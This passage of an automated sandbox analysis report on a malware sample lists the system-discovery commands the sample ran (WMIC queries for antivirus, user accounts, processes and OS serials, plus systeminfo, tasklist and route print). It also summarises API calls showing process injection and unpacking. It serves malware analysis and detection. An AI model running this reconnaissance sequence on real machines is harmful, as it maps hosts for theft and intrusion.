                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:24
                                                                                                                          Start time:12:25:01
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
                                                                                                                          Imagebase:0x7ff690150000
                                                                                                                          File size:576'000 bytes
                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

Target ID: 25
Start time: 12:25:03
Start date: 08/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Imagebase: 0x7ff690150000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 26
Start time: 12:25:05
Start date: 08/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Imagebase: 0x7ff690150000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 12:25:08
Start date: 08/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Imagebase: 0x7ff690150000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 28
Start time: 12:25:10
Start date: 08/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Imagebase: 0x7ff690150000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 29
Start time: 12:25:13
Start date: 08/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Imagebase: 0x7ff690150000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 30
Start time: 12:25:16
Start date: 08/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Imagebase: 0x7ff690150000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 31
Start time: 12:25:25
Start date: 08/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Imagebase: 0x7ff690150000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 32
Start time: 12:25:29
Start date: 08/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Imagebase: 0x7ff690150000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 33
Start time: 12:25:35
Start date: 08/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Imagebase: 0x7ff690150000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 34
Start time: 12:25:51
Start date: 08/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Imagebase: 0x7ff690150000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 35
Start time: 12:25:55
Start date: 08/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Imagebase: 0x7ff690150000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 36
Start time: 12:25:58
Start date: 08/10/2024
Path: C:\Windows\System32\ipconfig.exe
Wow64 process (32bit): false
Commandline: ipconfig /displaydns
Imagebase: 0x7ff7991c0000
File size: 35'840 bytes
MD5 hash: 62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 37
Start time: 12:25:59
Start date: 08/10/2024
Path: C:\Windows\System32\ROUTE.EXE
Wow64 process (32bit): false
Commandline: route print
Imagebase: 0x7ff7b1a40000
File size: 24'576 bytes
MD5 hash: 3C97E63423E527BA8381E81CBA00B8CD
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 38
Start time: 12:26:00
Start date: 08/10/2024
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: netsh firewall show state
Imagebase: 0x7ff6d3f90000
File size: 96'768 bytes
MD5 hash: 6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 39
Start time: 12:26:01
Start date: 08/10/2024
Path: C:\Windows\System32\systeminfo.exe
Wow64 process (32bit): false
Commandline: systeminfo
Imagebase: 0x7ff7d6860000
File size: 110'080 bytes
MD5 hash: EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 41
Start time: 12:26:06
Start date: 08/10/2024
Path: C:\Windows\System32\tasklist.exe
Wow64 process (32bit): false
Commandline: tasklist /v /fo csv
Imagebase: 0x7ff773010000
File size: 106'496 bytes
MD5 hash: D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false


                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:10%
                                                                                                                            Dynamic/Decrypted Code Coverage:26.2%
                                                                                                                            Signature Coverage:42.6%
                                                                                                                            Total number of Nodes:183
                                                                                                                            Total number of Limit Nodes:6

Control-flow Graph (function 00418DF0; rendered graph with Executed / Not Executed node colouring omitted)
                                                                                                                            APIs
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418F0B
                                                                                                                            • GetFocus.USER32 ref: 00418F11
                                                                                                                            • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418F1E
                                                                                                                            • FindAtomA.KERNEL32(00000000), ref: 00418F25
                                                                                                                            • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418F3D
                                                                                                                            • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00418F45
                                                                                                                            • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418F5D
                                                                                                                            • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418F84
                                                                                                                            • CopyFileExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418F90
                                                                                                                            • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418FA6
                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00418FAC
                                                                                                                            • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418FF1
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00419000
                                                                                                                            • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00419009
                                                                                                                            • ObjectPrivilegeAuditAlarmW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041901E
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0041902F
                                                                                                                            • SetCommState.KERNELBASE(00000000,00000000), ref: 00419058
                                                                                                                            • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00419089
                                                                                                                            • GetComputerNameA.KERNEL32(?,?), ref: 0041909D
                                                                                                                            • CopyFileW.KERNEL32(0041B3AC,0041B380,00000000), ref: 004190AE
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 004190B5
                                                                                                                            • GetConsoleAliasExesLengthW.KERNEL32 ref: 004190BB
                                                                                                                            • GetBinaryType.KERNEL32(0041B3C8,?), ref: 004190CD
                                                                                                                            • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004190E0
                                                                                                                            • GetLongPathNameA.KERNEL32(0041B3E4,?,00000000), ref: 004190F3
                                                                                                                            • PurgeComm.KERNEL32(00000000,00000000), ref: 004190FB
                                                                                                                            • LoadLibraryA.KERNELBASE(0041B3EC), ref: 00419172
                                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 004191A7
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 004191CE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233107637.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_40b000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleFile$CommNamePath$CompareCopyExchangeInterlockedLengthObjectSearch$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryComputerConfigCreateDefaultEnvironmentExesFindFocusFormatLibraryLoadLongMessageModeModuleMoveOutputPipePrivilegePurgeReadSingleStateStringsSystemTimeTypeWaitWrite
                                                                                                                            • String ID: k`$}$
                                                                                                                            • API String ID: 2220722107-956986773
                                                                                                                            • Opcode ID: 76067d98ed010348569ee083334d6030e4c9192beea86e856fa9a0357b35bb33
                                                                                                                            • Instruction ID: 4ca0833080540fc1689ebbf06c0baecda7ebd0e2289d1b61a46df4a83d3cd1a5
                                                                                                                            • Opcode Fuzzy Hash: 76067d98ed010348569ee083334d6030e4c9192beea86e856fa9a0357b35bb33
                                                                                                                            • Instruction Fuzzy Hash: F9B1B371902124ABDB219FA1EC48EDF7B79EF4D750F00806AF649A2151C7781AC5CFAE

Control-flow Graph (function 00401514; rendered graph with Executed / Not Executed node colouring omitted)
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                            • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                                                                            • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                            • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Control-flow Graph (function 004014FE; rendered graph with Executed / Not Executed node colouring omitted)
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1652636561-0
                                                                                                                            • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                            • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                                                                            • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                            • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Control-flow Graph (function 00401542; rendered graph with Executed / Not Executed node colouring omitted)
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                            • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                                                                            • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                            • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Control-flow Graph (function 00401549; rendered graph with Executed / Not Executed node colouring omitted)
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                            • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                                                                            • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                            • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                                                                             Control-flow Graph
                                                                                                                             • Function entry 0x401557 (rendered graph omitted; blocks 0x40154f-0x4018e3, overlapping the function above). Call sites: 0x40155b and 0x4018bc call 0x401193; 0x4015c4 calls NtDuplicateObject; 0x4015e1 and 0x401661 call NtCreateSection; 0x401607, 0x40162a, 0x401697 and 0x4016be call NtMapViewOfSection; 0x4016e0 calls 0x4016e5.
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                            • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                                                                            • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                            • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                                                                             Control-flow Graph
                                                                                                                             • Function entry 0x402f97 (rendered graph omitted; blocks 0x402f97-0x4030f3). The single API block 0x40307c-0x4030eb calls RtlCreateUserThread and then NtTerminateProcess; every other path ends in the exit block 0x4030ee.
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcessTerminateThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1921587553-0
                                                                                                                            • Opcode ID: c5436c7e7e6e3e410a730c8ca40359fc9cb55dc58de8f82c61b8b97930139c1a
                                                                                                                            • Instruction ID: 181ab879d947f068327b1ec0ddd27223b5b0ac2a90c427e8f19d47aa25efb225
                                                                                                                            • Opcode Fuzzy Hash: c5436c7e7e6e3e410a730c8ca40359fc9cb55dc58de8f82c61b8b97930139c1a
                                                                                                                            • Instruction Fuzzy Hash: 67417631228E0C4FD3A8DF2CA845BA277D5FB94311F6643AAE809D3389FA74C80183C5

                                                                                                                             Control-flow Graph
                                                                                                                             • Function entry 0x622a07 (rendered graph omitted; blocks 0x622a07-0x622a65). Block 0x622a2b calls CreateToolhelp32Snapshot; 0x622a47 calls Module32First; 0x622a56 calls 0x6226c6 before the exit block 0x622a5d.
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00622A2F
                                                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 00622A4F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233484367.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0061F000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_61f000_O4zPA1oI9Y.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3833638111-0
                                                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                            • Instruction ID: d6d409dfb297d282ac6a805e23bd18f4036b36d86e9f40f17b8723ffcf9f3f8b
                                                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                            • Instruction Fuzzy Hash: E2F06232500B227BD7303BB5AC9DBAA76E9AF49724F100628E642919C0DA70E8458A65

                                                                                                                             Control-flow Graph
                                                                                                                             • Function entry 0x5f003c (rendered graph omitted; blocks 0x5f003c-0x5f091d). Block 0x5f004c calls 0x5f0a3f, 0x5f0e0f, 0x5f0d90 and VirtualAlloc; 0x5f0265 calls 0x5f0a69; 0x5f02ce calls VirtualProtect, 0x5f0cce and 0x5f0ce7; 0x5f03e2 calls 0x5f0ce7 inside a loop; 0x5f0439 calls VirtualFree; 0x5f086e calls LoadLibraryA.
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005F024D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233359138.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5f0000_O4zPA1oI9Y.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID: cess$kernel32.dll
                                                                                                                            • API String ID: 4275171209-1230238691
                                                                                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                            • Instruction ID: 4b65ce4eff50f675edf1d61a99df40599f3613a345a7b7b0bfdd16d4a1f72893
                                                                                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                            • Instruction Fuzzy Hash: B9526974A01229DFDB64CF58C984BA8BBB1BF09304F1480D9E54DAB392DB34AE85DF14

                                                                                                                             Control-flow Graph
                                                                                                                             • Function entry 0x418af0 (rendered graph omitted): a single basic block 0x418af0-0x418c30 that calls GetModuleHandleW, GetProcAddress and VirtualProtect.
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00514D70), ref: 00418BCF
                                                                                                                            • GetProcAddress.KERNEL32(00000000,0041F298), ref: 00418C0C
                                                                                                                            • VirtualProtect.KERNELBASE(00514BB4,00514D6C,00000040,?), ref: 00418C2B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233107637.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_40b000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2099061454-3916222277
                                                                                                                            • Opcode ID: 41ccab38266b7cc203b6ab2e2252d2e1a9a4558b246985cc843167c3f4a64001
                                                                                                                            • Instruction ID: 441cc07c50422e985bd597f44fd2245cc03bf1e09111bb194a1dfbca8cfcce31
                                                                                                                            • Opcode Fuzzy Hash: 41ccab38266b7cc203b6ab2e2252d2e1a9a4558b246985cc843167c3f4a64001
                                                                                                                            • Instruction Fuzzy Hash: 88314918508680CAEB01DB78FC057923B66AB75709F04E0B9D14C8B7B1D7BB051E9B6A

                                                                                                                             Control-flow Graph
                                                                                                                             • Function entry 0x5f0e0f (rendered graph omitted; blocks 0x5f0e0f-0x5f0e2c). Block 0x5f0e0f calls SetErrorMode twice, then branches either through 0x5f0e26 or directly to the exit block 0x5f0e2b.
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,005F0223,?,?), ref: 005F0E19
                                                                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,005F0223,?,?), ref: 005F0E1E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233359138.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5f0000_O4zPA1oI9Y.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                            • Instruction ID: d5a6bee1921c2ef6b516d6639c820d1612de59ea02b9ca9833ad81ad95a80bb3
                                                                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                            • Instruction Fuzzy Hash: 21D0123154512CB7D7002A94DC09BDD7F1CDF05B62F048411FB0DD9081C774994046E5
